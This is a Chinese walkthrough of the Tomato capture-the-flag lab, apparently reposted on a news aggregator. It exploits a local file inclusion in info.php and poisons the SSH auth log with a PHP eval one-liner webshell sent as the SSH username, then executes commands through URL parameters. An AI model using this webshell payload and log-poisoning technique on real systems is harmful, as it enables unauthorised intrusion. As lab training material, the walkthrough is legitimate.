当前位置: 首页 > news >正文

Tomato靶场通关攻略

首先安装好后扫描ip找到靶场的ip

进来只有一个图片啥也不能干

找到ip后就可以扫描IP的目录文件了

进去访问就可以看到antibots目录

访问这个目录可以看见有好多文件

进来看见有个info.php进来看看

查看页面源代码发现存在文件包含漏洞

然后就有目标了这里读取etc/passwd

利用ssh连接写入木马 ssh '<?php @eval($_POST[qwe])?>'@192.168.248.133 -p2211

访问一句话木马
命令成功执行,说明一句话写入成功

view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=whoami

view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=id

然后再用蚁剑成功连接


http://www.mrgr.cn/news/20150.html

相关文章:

  • 【免费分享】嵌入式Linux开发板【入门+项目,应用+底层】资料包一网打尽,附教程/视频/源码...
  • 【C-实践】文件服务器(1.0)
  • C++——类和对象(1)
  • Hive时间窗口函数保姆级教程(最全解析、应用和优化)(持续更新)
  • 解析查看elf文件的构成
  • Python requests库详细介绍
  • 探索中国星坤:构建全球合作网络,服务全球客户!
  • 手机玩地平线教程 GameViewer远程助你手机随时随地玩3A大作 手机怎么玩地平线
  • 【开源免费】基于SpringBoot+Vue.JS在线竞拍系统(JAVA毕业设计)
  • 【Gtoken Tool】区块链在供应链多方协作场景中的应用优势是什么
  • Android OpenGLES开发:EGL环境搭建
  • 音频在线转换mp3:学会这2个方法,拿捏音频转换
  • webpack基本使用(基础)
  • 快充充电宝什么品牌最好最耐用?耐用口碑好快充充电宝推荐!
  • 为什么vite引用静态资源 new URL 更常用
  • springboot发送request请求的方式
  • npm login 或者 npm publish 超时timeout
  • 不要为《黑神话:悟空》买新电脑,ToDesk云电脑体验分享
  • 动态规划---一和零
  • “解决MySQL容器启动后无法编辑文件的问题:实用指南“